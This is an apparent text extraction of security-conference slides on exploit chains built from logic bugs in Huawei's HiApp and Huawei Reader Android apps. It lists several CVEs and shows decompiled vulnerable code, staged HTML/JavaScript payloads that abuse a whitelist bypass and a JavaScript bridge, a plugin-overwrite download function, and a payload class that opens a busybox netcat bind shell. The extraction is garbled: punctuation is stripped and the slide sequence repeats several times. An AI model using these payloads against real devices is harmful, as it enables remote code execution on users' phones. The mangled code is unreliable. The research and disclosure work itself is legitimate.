ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
PWN2OWN ndash Results
10
PUBLIC
Bug Hunting Approach
Browser attack surface
12
Exploit Mitigation Advancement
bull Memory Safety Mitigations
ndash ASLR PIE RELTO PartitionAlloc
bull Means you need mitigation bypass vulnerabilities too
bull Time consuming debugging memory corruption exploits on a real device
13
Attackers - Positives of Logic Bug Chains
bull Often design issues
ndash Hard to fix (long bug lives)
ndash Increased reliability
bull Architectural agnostic
ndash No problems with shellcode
bull Android IPC specifically is complex as hell
bull Harder to detect
14
Attackers - Negatives of Logic Bug Chains
bull They can get ridiculously long (11 Bugs in S8)
ndash One bug gets fixed and the whole chain is screwed
ndash Usually not particularly stealthy
Samsung phone rebooted
Huawei phone switches apps twice
bull Often requires a deeper understanding of the application
bull Automated detection is harder ndash how do you fuzz for logic bugs
15
Bug Hunting Tips
bull How too prioritise
ndash External Attack Surface (Reachable from browser)
ndash Permissions
Less of an issue for initial foothold
ndash Dangerous words
16
bull Want to rapidly find high risk issues in a large amount of apps
PUBLIC
Tooling and Automation
Toolset (Static vs Dynamic)
bull Android What do we care about
ndash BROWSABLE intents (Need to be web accessible) and Intents
ndash Content we can load into the applications (either via a WebView or Media)
ndash Controlled file writes reads
ndash Unsafe class loading
18
Increasing the attack surface
How do we get more things accessible
bull Intent Proxy Bugs
bull MITM stuff (SSL weaknesses)
19
Intent Proxy Example
bull Android Vendingbull LaunchUrlHandlerActivity
bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)
Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)
hellipif((v5) ampamp (v12))
v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1
hellip
Toolset (Static Analysis)
bull Rezord (internal) ndash Mass de-compilation of all apps
bull JEB
bull Grep
21
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
PUBLIC
Bug Hunting Approach
Browser attack surface
12
Exploit Mitigation Advancement
bull Memory Safety Mitigations
ndash ASLR PIE RELTO PartitionAlloc
bull Means you need mitigation bypass vulnerabilities too
bull Time consuming debugging memory corruption exploits on a real device
13
Attackers - Positives of Logic Bug Chains
bull Often design issues
ndash Hard to fix (long bug lives)
ndash Increased reliability
bull Architectural agnostic
ndash No problems with shellcode
bull Android IPC specifically is complex as hell
bull Harder to detect
14
Attackers - Negatives of Logic Bug Chains
bull They can get ridiculously long (11 Bugs in S8)
ndash One bug gets fixed and the whole chain is screwed
ndash Usually not particularly stealthy
Samsung phone rebooted
Huawei phone switches apps twice
bull Often requires a deeper understanding of the application
bull Automated detection is harder ndash how do you fuzz for logic bugs
15
Bug Hunting Tips
bull How too prioritise
ndash External Attack Surface (Reachable from browser)
ndash Permissions
Less of an issue for initial foothold
ndash Dangerous words
16
bull Want to rapidly find high risk issues in a large amount of apps
PUBLIC
Tooling and Automation
Toolset (Static vs Dynamic)
bull Android What do we care about
ndash BROWSABLE intents (Need to be web accessible) and Intents
ndash Content we can load into the applications (either via a WebView or Media)
ndash Controlled file writes reads
ndash Unsafe class loading
18
Increasing the attack surface
How do we get more things accessible
bull Intent Proxy Bugs
bull MITM stuff (SSL weaknesses)
19
Intent Proxy Example
bull Android Vendingbull LaunchUrlHandlerActivity
bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)
Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)
hellipif((v5) ampamp (v12))
v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1
hellip
Toolset (Static Analysis)
bull Rezord (internal) ndash Mass de-compilation of all apps
bull JEB
bull Grep
21
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
Browser attack surface
12
Exploit Mitigation Advancement
bull Memory Safety Mitigations
ndash ASLR PIE RELTO PartitionAlloc
bull Means you need mitigation bypass vulnerabilities too
bull Time consuming debugging memory corruption exploits on a real device
13
Attackers - Positives of Logic Bug Chains
bull Often design issues
ndash Hard to fix (long bug lives)
ndash Increased reliability
bull Architectural agnostic
ndash No problems with shellcode
bull Android IPC specifically is complex as hell
bull Harder to detect
14
Attackers - Negatives of Logic Bug Chains
bull They can get ridiculously long (11 Bugs in S8)
ndash One bug gets fixed and the whole chain is screwed
ndash Usually not particularly stealthy
Samsung phone rebooted
Huawei phone switches apps twice
bull Often requires a deeper understanding of the application
bull Automated detection is harder ndash how do you fuzz for logic bugs
15
Bug Hunting Tips
bull How too prioritise
ndash External Attack Surface (Reachable from browser)
ndash Permissions
Less of an issue for initial foothold
ndash Dangerous words
16
bull Want to rapidly find high risk issues in a large amount of apps
PUBLIC
Tooling and Automation
Toolset (Static vs Dynamic)
bull Android What do we care about
ndash BROWSABLE intents (Need to be web accessible) and Intents
ndash Content we can load into the applications (either via a WebView or Media)
ndash Controlled file writes reads
ndash Unsafe class loading
18
Increasing the attack surface
How do we get more things accessible
bull Intent Proxy Bugs
bull MITM stuff (SSL weaknesses)
19
Intent Proxy Example
bull Android Vendingbull LaunchUrlHandlerActivity
bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)
Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)
hellipif((v5) ampamp (v12))
v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1
hellip
Toolset (Static Analysis)
bull Rezord (internal) ndash Mass de-compilation of all apps
bull JEB
bull Grep
21
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
